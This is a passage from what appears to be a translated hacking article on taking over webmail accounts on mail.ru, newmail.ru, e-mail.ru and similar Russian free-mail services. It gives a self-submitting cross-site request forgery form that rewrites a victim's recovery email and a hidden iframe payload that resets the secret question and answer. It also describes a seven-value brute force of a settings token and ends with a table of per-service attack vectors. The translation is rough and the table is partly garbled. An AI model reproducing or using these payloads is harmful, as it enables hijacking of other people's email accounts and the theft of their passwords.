truth of the GET method is that the settings in the mail.ru box can not be changed now, so I'll describe in detail the technical side of the question.
I. We send to the desired box a letter with a code that will generate a frame directly in the body of the message with a link to our site. If possible, the script should work without any user input (click, click, mouseover, image upload, etc.):
II. On the resource http://yoursite.ru we have an HTML document with a form for sending the changed data to the mail.ru server.
The contents of yourscript.html:
<form method = "post" action = "http://win.mail.ru/cgi-bin/anketa" name = "anketa"> <br> <input type = "hidden" name = "page" value = "2"> <br> <input type = "hidden" name = "Email" value = "email@example.com"> <br> <input type = "hidden" value = "Save" name = "Save"> <br> </ form> <br> <script> <br> document.anketa.submit (); <br> </ script>Notes: the work of the client part of the script in an unchanged form is guaranteed only for IE; The form of sending is posted on a separate site specifically to "unload" the letter.
We implement the script through the style tag.
Address of the page with the settings: http://mail01.mail.com/scripts/common/genprofile.cgi
Form name: profileform
The name of the text field with a secret response: hint_a
WWW.NEWMAIL.RUIn my opinion, a fairly popular postman, so I'll tell you about it in detail. Moreover, it is much easier to take possession of another's account than it seems at first sight. You can do this: send a message with a script that will receive session id at startup, generate the necessary queries, and change the settings of the altrenrative email (to which the password is subsequently sent) and the secret question and answer. However, if you specify any other address with a reminder, the password will be sent to it, so long as the secret answer is correct. And the following observation: session id for changing the settings can not be used at all. Plus, all tags are allowed. All of the above reduces the amount of code to a couple of lines:
<iframe src = http: //newmail.ru/users/chpass.dhtml? cp_msg = 1 & cp_quest = QUESTION & cp_answ = ANSWER width = 0 height = 0> </ iframe>
The method of hacking e-mail.ru somewhat does not fit into the general theme of the article, but still - mail . When I needed to get a password from one box, I registered my account as usual and began to investigate the system. The first thing that caught my eye was the ability to set a new password and a secret question with an answer, without entering the old password. The usual action plan is to check the filtering of tags, get the ID and execute the query. However, to change the settings used a special variable utoken, which is contained in the body of the document. After experimenting with the change of the question and the answer with the previously known utoken:
I have come to the conclusion that ID and cookies for changing the settings are not required. In this case, after monitoring utoken, it was found that the four-digit hexadecimal number after the email address firstname.lastname@example.org lies in a very narrow range. Namely, to establish a secret question with the answer on any box of interest to us, you need to go through just 7 options: 5a00 , 5b00 , 5c00 , 5d00 , 5e00 , 5f00 , 6000 . When the number is guessed, we will get into the desired box.
Notes: at the moment there have been some changes. Password recovery service does not work, so it is advisable to change it immediately. The address of the configuration change has also changed:
The method does not work forever. Probably, all the same it is required that the user from time to time go into the mail through the web .
Table with characteristics of free WWW-servers
inbox.ru , bk.ru , list.ru ,
email.com , post.com , myself.com , consultant.com and others.
nm.ru , hotmail.ru , orc.ru , nightmail.ru
|In any way||Read / change the question and answer. The password is valid|
| www.netman.ru and www.mailgate.ru
the same postman. about 80 domains
|www.yandex.ru||OnError, OnLoad||Removing the site * .narod.ru (JS is not required)|
|www.ukr.net|| embed src = javasc
ript: this .wav>
|Read the answer to your security question|
xaker.ru , email.su , russian.ru , students.ru , programist.ru , designer.ru , mail2k.ru ,
pochta.ru , pisem.net , fromru.com , land.ru , and others.
|In many ways||Account deleting|